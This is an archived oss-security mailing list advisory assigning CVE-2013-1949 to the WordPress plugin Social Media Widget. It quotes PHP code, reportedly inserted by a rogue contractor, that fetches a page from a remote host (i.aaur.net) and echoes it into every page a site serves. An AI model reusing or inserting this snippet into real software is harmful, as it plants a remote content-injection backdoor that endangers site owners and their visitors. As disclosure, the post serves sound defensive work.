Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <516A2D12.3080905@redhat.com>
Date: Sat, 13 Apr 2013 22:14:10 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: Open Source Security <oss-security@...ts.openwall.com>,
        security@...dpress.org
Subject: CVE-2013-1949 Social Media Widget remote file inclusion

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation

So the company responsible for Social Media Widget claims that a rogue
developer they contracted inserted this code:

470
471	 $smw_url = "hxxp://i.aaur.net/i.php";
472	 if(!function_exists("smw_get")){
473	 function smw_get($f) {
474	 $response = wp_remote_get( $f );
475	 if( is_wp_error( $response ) ) {
476	 function smw_get_body($f) {
477	 $ch = @curl_init();
478	 @curl_setopt($ch, CURLOPT_URL, $f);
479	 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480	 $output = @curl_exec($ch);
481	 @curl_close($ch);
482	 return $output;
483	 }
484	 echo smw_get_body($f);
485	 } else {
486	 echo $response["body"];
487	 }
488	 }
489	 smw_get($smw_url);
490	 }

Regardless of HOW this code got into the plugin it represents a
significant security issue. Any site using this plugin is pulling
"hxxp://i.aaur.net/i.php" and including it in the page they generate
and send to a user. This opens up a huge can of worms, anyone that can
man in the middle your server can now inject PHP into your blog, ot
anything sent to the clients/etc.

Please use CVE-2013-1949 for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRai0SAAoJEBYNRVNeJnmT6loP/RkU7/7kLWkbMxzxK09A8LQs
S/YkaDcc3jx9qPL7RLEW837U/KVEuPxtCN1rHv4r/q2ZVsRUiNhkO/vhB37jXmrX
gNLP6sm0SMXj0v9FrllcDi6YsHmbekMInEdH3u+X9qE2nHJWsadXyzX6Pl4l3nOf
cC18tNm6QB6pTV1JCP3OZcri+AMP8tqMJA9E1evgsvu+0kPFB/6rgKViteA/ejVg
gkkiy6jdRnXw2PMsFVM0dOoXAXknvQu/7Ow0e2ONWhyhWIk6vifIqhtAqja58u/7
bqV/Jd7fLuj2fZEkuckZILbk+jgnTEdkVz12ym5/1ieYUtzj6KxhSP2lAwsWwV0F
+MKpeS0wW3z8KMzPnSGf8NOw+GdU+N+HzSgj6xpOUho53KFUppv2690CTlMMI9L6
drOOpDyP296pZPf7eoulnJnUOCSH8gX4+Rvk75YNrHnYL8VTxgUGcmJWyGLuQdGC
/ZI1IHdlkaRgL1O6w/DlLpKHV7E0Fj3silt/WwKwhB4kYQiei0dmVEuuMmYgq3vJ
6srRO5Glk9peB+3LHRXEUd8z36GZFXP0mmssPiWLuq1NfzROrYSq4xaqKuPsQ+uo
1tkrZ02LNsN7j2vFDLrTK6RpY6BjMUQvdY6rtiuy7fdbndNF6tt5rWr4xjIKoXti
DpvupDzrdKT6n8ffkTqV
=wTdQ
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.